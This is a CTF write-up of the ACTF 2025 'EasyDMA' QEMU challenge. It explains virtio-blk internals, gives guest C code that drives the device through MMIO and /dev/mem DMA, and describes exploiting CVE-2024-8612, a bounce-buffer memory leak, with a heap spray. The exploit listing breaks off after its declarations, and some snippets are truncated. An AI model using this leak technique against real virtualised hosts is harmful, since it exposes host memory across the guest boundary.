QEMU PWN - EasyDMA

EasyDMA

From: ACTF 2025

题目给出一个去符号的 qemu 二进制文件 qemu-system-x86_64,启动参数如下

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
timeout --foreground 300 ./qemu-system-x86_64 \
-L pc-bios \
-m 1024 \
-kernel bzImage \
-initrd rootfs.cpio \
-drive file=null-co://,if=none,id=mydisk \
-device virtio-blk-pci,drive=mydisk,ioeventfd=off \
-device readflag \
-append "priority=low console=ttyS0" \
-monitor /dev/null \
-nographic

添加两个设备 virtio-blk-pci, readflag

反汇编可以找到 readflag 通过 mmio 的读、写回调函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
__int64 __fastcall readflag_mmio_read(__int64 opaque, unsigned __int64 addr, int size)
{
__int64 result; // rax

if ( addr > 0x7F )
{
result = -1LL;
if ( size != 4 )
return result;
}
else if ( size != 4 )
{
result = -1LL;
if ( size != 8 )
return result;
}
result = 0xDEADBEEFLL;
if ( addr )
{
if ( addr == 8 )
return *(_QWORD *)(opaque + 2984);
else
return -1LL;
}
return result;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
void __fastcall readflag_mmio_write(__int64 opaque, unsigned __int64 addr, size_t val, int size)
{
void *v4; // rbp
FILE *v5; // rax
FILE *v6; // r12
size_t v7; // rax
int v8; // [rsp+0h] [rbp-20h]

if ( addr > 0x7F )
{
if ( size != 4 )
return;
}
else if ( size != 4 )
{
if ( size == 8 && addr == 8 )
goto LABEL_6;
return;
}
if ( addr )
{
if ( addr == 8 )
LABEL_6:
*(_QWORD *)(opaque + 2984) = val;
}
else if ( val <= 0xFFF )
{
v8 = val;
v4 = malloc(val);
if ( v4 )
{
v5 = fopen64("flag", "r");
v6 = v5;
if ( v5 )
{
v7 = fread(v4, 1uLL, (unsigned int)(v8 - 1), v5);
if ( v7 )
*((_BYTE *)v4 + v7) = 0;
else
puts("No data read from the file.");
free(v4);
fclose(v6);
}
else
{
perror("Error opening file");
free(v4);
}
}
else
{
perror("Memory allocation failed");
}
}
}

Virtio Block Device1

Data types definition

For the integer data types used in the structure definitions, the following conventions are used:

  • u8, u16, u32, u64

    An unsigned integer of the specified length in bits.

  • le16, le32, le64

    An unsigned integer of the specified length in bits, in little-endian byte order.

1
2
3
4
5
6
7
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define u64 uint64_t
#define le16 u16
#define le32 u32
#define le64 u64

PCI Capabilities

1
2
3
4
5
6
7
8
9
10
11
struct virtio_pci_cap {
u8 cap_vndr; /* Generic PCI field: PCI_CAP_ID_VNDR */
u8 cap_next; /* Generic PCI field: next ptr. */
u8 cap_len; /* Generic PCI field: capability length */
u8 cfg_type; /* Identifies the structure. */
u8 bar; /* Where to find it. */
u8 id; /* Multiple capabilities of the same type */
u8 padding[2/* Pad to full dword. */
le32 offset; /* Offset within bar. */
le32 length; /* Length of the structure, in bytes. */

cfg_type identifies the structure, according to the following table:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* Common configuration */
#define VIRTIO_PCI_CAP_COMMON_CFG 1
/* Notifications */
#define VIRTIO_PCI_CAP_NOTIFY_CFG 2
/* ISR Status */
#define VIRTIO_PCI_CAP_ISR_CFG 3
/* Device specific configuration */
#define VIRTIO_PCI_CAP_DEVICE_CFG 4
/* PCI configuration access */
#define VIRTIO_PCI_CAP_PCI_CFG 5
/* Shared memory region */
#define VIRTIO_PCI_CAP_SHARED_MEMORY_CFG 8
/* Vendor-specific data */
#define VIRTIO_PCI_CAP_VENDOR_CFG 9

For common configuration, its layout is below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct virtio_pci_common_cfg {
/* About the whole device. */
le32 device_feature_select; /* read-write */
le32 device_feature; /* read-only for driver */
le32 driver_feature_select; /* read-write */
le32 driver_feature; /* read-write */
le16 config_msix_vector; /* read-write */
le16 num_queues; /* read-only for driver */
u8 device_status; /* read-write */
u8 config_generation; /* read-only for driver */
/* About a specific virtqueue. */
le16 queue_select; /* read-write */
le16 queue_size; /* read-write */
le16 queue_msix_vector; /* read-write */
le16 queue_enable; /* read-write */
le16 queue_notify_off; /* read-only for driver */
le64 queue_desc; /* read-write */
le64 queue_driver; /* read-write */
le64 queue_device; /* read-write */
le16 queue_notif_config_data; /* read-only for driver */
le16 queue_reset; /* read-write */
/* About the administration virtqueue. */
le16 admin_queue_index; /* read-only for driver */
le16 admin_queue_num; /* read-only for driver */

For notification, its layout is below:

1
2
3
4
5
struct virtio_pci_notify_cap {
struct virtio_pci_cap cap;
le32 notify_off_multiplier; /* Multiplier for queue_notify_off. */


We recognize these type, and record the offset.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
void print_cap(struct virtio_pci_cap* cap){
printf("cap_len: %x\n", cap->cap_len);
switch(cap->cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
printf("cfg_type: common\n");
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
printf("cfg_type: notify\n");
break;
case VIRTIO_PCI_CAP_ISR_CFG:
printf("cfg_type: isr\n");
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
printf("cfg_type: device\n");
break;
case VIRTIO_PCI_CAP_PCI_CFG:
printf("cfg_type: pci\n");
break;
case VIRTIO_PCI_CAP_SHARED_MEMORY:
printf("cfg_type: shared memory\n");
break;
case VIRTIO_PCI_CAP_VENDOR_CFG:
printf("cfg_type: vendor\n");
break;
default:
printf("cfg_type: unknown\n");
break;
}
printf("bar: %x\n", cap->bar);
printf("id: %x\n", cap->id);
printf("offset: %x\n", cap->offset);
printf("length: %x\n", cap->length);
}

switch(cap.cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
virtio_common_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
break;
case VIRTIO_PCI_CAP_ISR_CFG:
virtio_isr_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
virtio_device_mmio = virtio_mmio + cap.offset;
break;
default:
break;
}

Virtqueue2

The mechanism for bulk data transport on virtio devices is pretentiously called a virtqueue. Each device can have zero or more virtqueues.

Each virtqueue can consist of up to 3 parts:

​ • Descriptor Area - used for describing buffers

​ • Driver Area - extra data supplied by driver to the device. Also called avail virtqueue.

​ • Device Area - extra data supplied by device to driver. Also called used virtqueue.

Shared memory with split ring elements

There areas structure defined below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
struct virtq_desc {
/* Address (guest-physical). */
le64 addr;
/* Length. */
le32 len;
/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT 1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE 2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
/* The flags as indicated above. */
le16 flags;
/* Next field if flags & NEXT */
le16 next;
};

struct virtq_avail {
#define VIRTQ_AVAIL_F_NO_INTERRUPT 1
le16 flags;
le16 idx;
le16 ring[VIRTIO_QUEUE_SIZE];
le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

struct virtq_used_elem {
/* Index of start of used descriptor chain. */
le32 id;

/*
* The number of bytes written into the device writable portion of
* the buffer described by the descriptor chain.
*/
le32 len;
};

struct virtq_used {
#define VIRTQ_USED_F_NO_NOTIFY 1
le16 flags;
le16 idx;
struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};

The driver queues requests to the virtqueue, the type of the request is either a read (VIRTIO_BLK_T_IN), a write (VIRTIO_BLK_T_OUT), a discard (VIRTIO_BLK_T_DISCARD), a write zeroes (VIRTIO_BLK_T_WRITE_ZEROES) or a flush (VIRTIO_BLK_T_FLUSH).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
struct virtio_blk_req { 
le32 type;
le32 reserved;
le64 sector;
u8 data[][512];
u8 status;
};

struct virtio_blk_discard_write_zeroes {
le64 sector;
le32 num_sectors;
struct {
le32 unmap:1;
le32 reserved:31;
} flags;
};

#define VIRTIO_BLK_T_IN 0
#define VIRTIO_BLK_T_OUT 1
#define VIRTIO_BLK_T_FLUSH 4
#define VIRTIO_BLK_T_DISCARD 11
#define VIRTIO_BLK_T_WRITE_ZEROES 13

MMIO3

Memory-mapped I/O (MMIO) uses the same address space to address both main memory and I/O devices. The memory and registers of the I/O devices are mapped to (associated with) address values, so a memory address may refer to either a portion of physical RAM or to memory and registers of the I/O device.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
uint8_t mmio_read8(void* addr){
return *(volatile uint8_t*)addr;
}

uint16_t mmio_read16(void* addr){
return *(volatile uint16_t*)addr;
}

uint32_t mmio_read32(void* addr){
return *(volatile uint32_t*)addr;
}

uint64_t mmio_read64(void* addr){
return *(volatile uint64_t*)addr;
}

void mmio_write8(void* addr, uint8_t val){
*(volatile uint8_t*)addr = val;
}

void mmio_write16(void* addr, uint16_t val){
*(volatile uint16_t*)addr = val;
}

void mmio_write32(void* addr, uint32_t val){
*(volatile uint32_t*)addr = val;
}

void mmio_write64(void* addr, uint64_t val){
*(volatile uint64_t*)addr = val;
}

Device configuration layout

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
struct virtio_blk_config {
le64 capacity;
le32 size_max;
le32 seg_max;
struct virtio_blk_geometry {
le16 cylinders;
u8 heads;
u8 sectors;
} geometry;
le32 blk_size;
struct virtio_blk_topology {
// # of logical blocks per physical block (log2)
u8 physical_block_exp;
// offset of first aligned logical block
u8 alignment_offset;
// suggested minimum I/O size in blocks
le16 min_io_size;
// optimal (suggested maximum) I/O size in blocks
le32 opt_io_size;
} topology;
u8 writeback;
u8 unused0;
u16 num_queues;
le32 max_discard_sectors;
le32 max_discard_seg;
le32 discard_sector_alignment;
le32 max_write_zeroes_sectors;
le32 max_write_zeroes_seg;
u8 write_zeroes_may_unmap;
u8 unused1[3
le32 max_secure_erase_sectors;
le32 max_secure_erase_seg;
le32 secure_erase_sector_alignment;
struct virtio_blk_zoned_characteristics {
le32 zone_sectors;
le32 max_open_zones;
le32 max_active_zones;
le32 max_append_sectors;
le32 write_granularity;
u8 model;
u8 unused2[3
} zoned;

Initialization

  1. Read capabilities
  2. Reset device
  3. Reset Virtqueue
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
void init_virtio() {
int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
if(fd < 0){
ERR("Open virtio config");
}
struct virtio_pci_cap cap;
char* config = malloc(0x1000);
int bytes_read = read(fd, config, 0x1000);
if(bytes_read < 0){
ERR("Read virtio config");
}

fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
if(fd < 0){
ERR("Open virtio resource4");
}
virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
if(virtio_mmio == (volatile void*)-1){
ERR("mmap virtio mem");
}
close(fd);

u8 cap_ptr = *(u8*)(config+0x34);
while(cap_ptr != 0){
if(config[cap_ptr] != 0x9){
cap_ptr = *(u8*)(config+cap_ptr+1);
continue;
}
memcpy(&cap, config+cap_ptr, sizeof(cap));
print_cap(&cap);
switch(cap.cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
virtio_common_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
break;
case VIRTIO_PCI_CAP_ISR_CFG:
virtio_isr_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
virtio_device_mmio = virtio_mmio + cap.offset;
break;
default:
break;
}
cap_ptr = cap.cap_next;
}
close(fd);
free(config);

struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
mmio_write32(&common_cfg->device_feature_select, 0);
printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->device_feature_select, 1);
printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->driver_feature_select, 0);
printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
mmio_write32(&common_cfg->driver_feature_select, 1);
printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

// reset device
mmio_write8(&common_cfg->device_status, 0);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write32(&common_cfg->driver_feature_select, 0);
mmio_write32(&common_cfg->driver_feature, 0); // disable all features
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);


// alloc dma memory
int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
if(dma_fd < 0){
ERR("Open dma");
}
dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
if(dma_mem == (volatile void*)-1){
ERR("mmap dma mem");
}
*(volatile uint32_t*)dma_mem = 0x12345678;
printf("%x\n", *(volatile uint32_t*)dma_mem);
*(volatile uint32_t*)dma_mem = 0;
printf("dma_mem: %p\n", dma_mem);
dma_data = dma_mem + 0x1000;
queue_desc = (struct virtq_desc*)dma_mem;
queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);

// init queue
mmio_write16(&common_cfg->queue_select, 0);
mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
mmio_write16(&common_cfg->queue_enable, 1);

mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
puts("virtio init done");
}

Vulnerabilities

CVE-2024-8612

从文件的字符串中可得知 qemu 的版本号为 qemu-8.0.0-rc2,存在一个关于 virtio-blk-pci 的信息泄漏漏洞: CVE-2024-8612

具体利用还可以参考:

HEXACON2024 - DMAKiller: DMA to Escape from QEMU/KVM by Yongkang Jia, Yiming Tao & Xiao Lei,

ACTF2025-EasyDMA Writeup

当 DMA 访问的地址是 MMIO 的,会使用 bounce buffer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/* Map a physical memory region into a host virtual address.
* May map a subset of the requested range, given by and returned in *plen.
* May return NULL if resources needed to perform the mapping are exhausted.
* Use only for reads OR writes - not for read-modify-write operations.
* Use cpu_register_map_client() to know when retrying the map operation is
* likely to succeed.
*/
void *address_space_map(AddressSpace *as,
hwaddr addr,
hwaddr *plen,
bool is_write,
MemTxAttrs attrs)
{
hwaddr len = *plen;
hwaddr l, xlat;
MemoryRegion *mr;
FlatView *fv;

if (len == 0) {
return NULL;
}

l = len;
RCU_READ_LOCK_GUARD();
fv = address_space_to_flatview(as);
mr = flatview_translate(fv, addr, &xlat, &l, is_write, attrs);

if (!memory_access_is_direct(mr, is_write)) {
if (qatomic_xchg(&bounce.in_use, true)) {
*plen = 0;
return NULL;
}
/* Avoid unbounded allocations */
l = MIN(l, TARGET_PAGE_SIZE);
bounce.buffer = qemu_memalign(TARGET_PAGE_SIZE, l);
bounce.addr = addr;
bounce.len = l;

memory_region_ref(mr);
bounce.mr = mr;
if (!is_write) {
flatview_read(fv, addr, MEMTXATTRS_UNSPECIFIED,
bounce.buffer, l);
}

*plen = l;
return bounce.buffer;
}
//...
}

同时,通过 qemu_memalign 得到的内存并没有初始化。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
static int virtio_blk_handle_request(VirtIOBlockReq *req, MultiReqBuffer *mrb)
{
uint32_t type;
struct iovec *in_iov = req->elem.in_sg;
struct iovec *out_iov = req->elem.out_sg;
unsigned in_num = req->elem.in_num;
unsigned out_num = req->elem.out_num;
VirtIOBlock *s = req->dev;
VirtIODevice *vdev = VIRTIO_DEVICE(s);

if (req->elem.out_num < 1 || req->elem.in_num < 1) {
virtio_error(vdev, "virtio-blk missing headers");
return -1;
}

if (unlikely(iov_to_buf(out_iov, out_num, 0, &req->out,
sizeof(req->out)) != sizeof(req->out))) {
virtio_error(vdev, "virtio-blk request outhdr too short");
return -1;
}

iov_discard_front_undoable(&out_iov, &out_num, sizeof(req->out),
&req->outhdr_undo);

if (in_iov[in_num - 1].iov_len < sizeof(struct virtio_blk_inhdr)) {
virtio_error(vdev, "virtio-blk request inhdr too short");
iov_discard_undo(&req->outhdr_undo);
return -1;
}

//...

req->in_len = iov_size(in_iov, in_num);

//...

case VIRTIO_BLK_T_IN:
{
bool is_write = type & VIRTIO_BLK_T_OUT;
req->sector_num = virtio_ldq_p(vdev, &req->out.sector);

if (is_write) {
qemu_iovec_init_external(&req->qiov, out_iov, out_num);
trace_virtio_blk_handle_write(vdev, req, req->sector_num,
req->qiov.size / BDRV_SECTOR_SIZE);
} else {
qemu_iovec_init_external(&req->qiov, in_iov, in_num);
trace_virtio_blk_handle_read(vdev, req, req->sector_num,
req->qiov.size / BDRV_SECTOR_SIZE);
}

if (!virtio_blk_sect_range_ok(s, req->sector_num, req->qiov.size)) {
virtio_blk_req_complete(req, VIRTIO_BLK_S_IOERR);
block_acct_invalid(blk_get_stats(s->blk),
is_write ? BLOCK_ACCT_WRITE : BLOCK_ACCT_READ);
virtio_blk_free_request(req);
return 0;
}

//...

default:
virtio_blk_req_complete(req, VIRTIO_BLK_S_UNSUPP);
virtio_blk_free_request(req);

}

virtio_blk_handle_request,即使请求不合法,长度也被写入到 req->in_lentype 不合法时,直接调用 virtio_blk_req_complete

调用链:virtio_blk_handle_request->virtio_blk_req_complete->virtqueue_push->virtqueue_fill->virtqueue_unmap_sg->dma_memory_unmap->address_space_unmap->address_space_write

1
2
3
4
5
6
7
8
MemTxResult address_space_write(AddressSpace *as, hwaddr addr,
MemTxAttrs attrs,
const void *buf, int len)
{
MemTxResult result;
__bufread(buf, len);
return result;
}

由于缺乏保护,数据可以被写到 Common configuration 部分,并且部分空间可被读出。

Exploit

通过堆喷,将 flag 字符串填充在内存中。利用上述漏洞读出内存内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
#include<stddef.h>
#include<stdlib.h>
#include<unistd.h>
#include<fcntl.h>
#include<sys/mman.h>
#include<string.h>
#include<stdio.h>
#include<assert.h>
#include<stdint.h>
#include<sys/io.h>
#include<linux/stddef.h>

#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define u64 uint64_t
#define le16 u16
#define le32 u32
#define le64 u64

struct virtio_pci_cap {
u8 cap_vndr;
u8 cap_next;
u8 cap_len;
u8 cfg_type;
u8 bar;
u8 id;
u8 padding[2];
le32 offset;
le32 length;
};

struct virtio_pci_common_cfg {
/* About the whole device. */
le32 device_feature_select; /* read-write */
le32 device_feature; /* read-only for driver */
le32 driver_feature_select; /* read-write */
le32 driver_feature; /* read-write */
le16 config_msix_vector; /* read-write */
le16 num_queues; /* read-only for driver */
u8 device_status; /* read-write */
u8 config_generation; /* read-only for driver */
/* About a specific virtqueue. */
le16 queue_select; /* read-write */
le16 queue_size; /* read-write */
le16 queue_msix_vector; /* read-write */
le16 queue_enable; /* read-write */
le16 queue_notify_off; /* read-only for driver */
le64 queue_desc; /* read-write */
le64 queue_driver; /* read-write */
le64 queue_device; /* read-write */
le16 queue_notify_data; /* read-only for driver */
le16 queue_reset; /* read-write */
};

struct virtio_notify_cfg {
struct virtio_pci_cap cap;
le32 notify_off_multiplier;
};

struct virtio_blk_config{
le64 capacity;
le32 size_max;
le32 seg_max;
struct virtio_blk_geometry {
le16 cylinders;
u8 heads;
u8 sectors;
} geometry;
le32 blk_size;
struct virtio_blk_topology {
// # of logical blocks per physical block (log2)
u8 physical_block_exp;
// offset of first aligned logical block
u8 alignment_offset;
// suggested minimum I/O size in blocks
le16 min_io_size;
// optimal (suggested maximum) I/O size in blocks
le32 opt_io_size;
} topology;
u8 writeback;
u8 unused0;
u16 num_queues;
le32 max_discard_sectors;
le32 max_discard_seg;
le32 discard_sector_alignment;
le32 max_write_zeroes_sectors;
le32 max_write_zeroes_seg;
u8 write_zeroes_may_unmap;
u8 unused1[3];
le32 max_secure_erase_sectors;
le32 max_secure_erase_seg;
le32 secure_erase_sector_alignment;
};

enum virtio_pci_cfg_type{
VIRTIO_PCI_CAP_COMMON_CFG = 0x1,
VIRTIO_PCI_CAP_NOTIFY_CFG = 0x2,
VIRTIO_PCI_CAP_ISR_CFG = 0x3,
VIRTIO_PCI_CAP_DEVICE_CFG = 0x4,
VIRTIO_PCI_CAP_PCI_CFG = 0x5,
VIRTIO_PCI_CAP_SHARED_MEMORY = 0x8,
VIRTIO_PCI_CAP_VENDOR_CFG = 0x9,
};

/* Feature bits */
#define VIRTIO_BLK_F_SIZE_MAX 1 /* Indicates maximum segment size */
#define VIRTIO_BLK_F_SEG_MAX 2 /* Indicates maximum # of segments */
#define VIRTIO_BLK_F_GEOMETRY 4 /* Legacy geometry available */
#define VIRTIO_BLK_F_RO 5 /* Disk is read-only */
#define VIRTIO_BLK_F_BLK_SIZE 6 /* Block size of disk is available*/
#define VIRTIO_BLK_F_FLUSH 9 /* Flush command supported */
#define VIRTIO_BLK_F_TOPOLOGY 10 /* Topology information is available */
#define VIRTIO_BLK_F_MQ 12 /* support more than one vq */
#define VIRTIO_BLK_F_DISCARD 13 /* DISCARD is supported */
#define VIRTIO_BLK_F_WRITE_ZEROES 14 /* WRITE ZEROES is supported */
#define VIRTIO_BLK_F_SECURE_ERASE 16 /* Secure Erase is supported */

/* Status byte for guest to report progress, and synchronize features. */
/* We have seen device and processed generic fields (VIRTIO_CONFIG_F_VIRTIO) */
#define VIRTIO_CONFIG_S_ACKNOWLEDGE 1
/* We have found a driver for the device. */
#define VIRTIO_CONFIG_S_DRIVER 2
/* Driver has used its parts of the config, and is happy */
#define VIRTIO_CONFIG_S_DRIVER_OK 4
/* Driver has finished configuring features */
#define VIRTIO_CONFIG_S_FEATURES_OK 8
/* Device entered invalid state, driver must reset it */
#define VIRTIO_CONFIG_S_NEEDS_RESET 0x40
/* We've given up on this device. */
#define VIRTIO_CONFIG_S_FAILED 0x80

#define VIRTIO_QUEUE_SIZE 0x10

struct virtq_desc {
/* Address (guest-physical). */
le64 addr;
/* Length. */
le32 len;
/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT 1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE 2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
/* The flags as indicated above. */
le16 flags;
/* Next field if flags & NEXT */
le16 next;
};

struct virtq_avail {
#define VIRTQ_AVAIL_F_NO_INTERRUPT 1
le16 flags;
le16 idx;
le16 ring[VIRTIO_QUEUE_SIZE];
le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

struct virtq_used_elem {
/* Index of start of used descriptor chain. */
le32 id;

/*
* The number of bytes written into the device writable portion of
* the buffer described by the descriptor chain.
*/
le32 len;
};

struct virtq_used {
#define VIRTQ_USED_F_NO_NOTIFY 1
le16 flags;
le16 idx;
struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};

struct virtio_blk_req {
le32 type;
le32 reserved;
le64 sector;
u8 data[0];
// u8 status;
};

#define VIRTIO_BLK_T_IN 0
#define VIRTIO_BLK_T_OUT 1
#define VIRTIO_BLK_T_FLUSH 4
#define VIRTIO_BLK_T_GET_ID 8
#define VIRTIO_BLK_T_GET_LIFETIME 10
#define VIRTIO_BLK_T_DISCARD 11
#define VIRTIO_BLK_T_WRITE_ZEROES 13
#define VIRTIO_BLK_T_SECURE_ERASE 14


void print_cap(struct virtio_pci_cap* cap){
printf("cap_len: %x\n", cap->cap_len);
switch(cap->cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
printf("cfg_type: common\n");
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
printf("cfg_type: notify\n");
break;
case VIRTIO_PCI_CAP_ISR_CFG:
printf("cfg_type: isr\n");
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
printf("cfg_type: device\n");
break;
case VIRTIO_PCI_CAP_PCI_CFG:
printf("cfg_type: pci\n");
break;
case VIRTIO_PCI_CAP_SHARED_MEMORY:
printf("cfg_type: shared memory\n");
break;
case VIRTIO_PCI_CAP_VENDOR_CFG:
printf("cfg_type: vendor\n");
break;
default:
printf("cfg_type: unknown\n");
break;
}
printf("bar: %x\n", cap->bar);
printf("id: %x\n", cap->id);
printf("offset: %x\n", cap->offset);
printf("length: %x\n", cap->length);
}

void ERR(const char* buf){
perror(buf);
abort();
}

void LOG(const char* buf){
write(2, buf, strlen(buf));
}

volatile char* readflag_mmio = NULL;
volatile char* virtio_mmio = NULL;
volatile char* virtio_common_mmio = NULL;
volatile struct virtio_notify_cfg* virtio_notify_mmio = NULL;
volatile char* virtio_isr_mmio = NULL;
volatile char* virtio_device_mmio = NULL;
volatile char* dma_mem = NULL;
volatile char* dma_data = NULL;
volatile struct virtq_desc* queue_desc = NULL;
volatile struct virtq_avail* queue_avail = NULL;
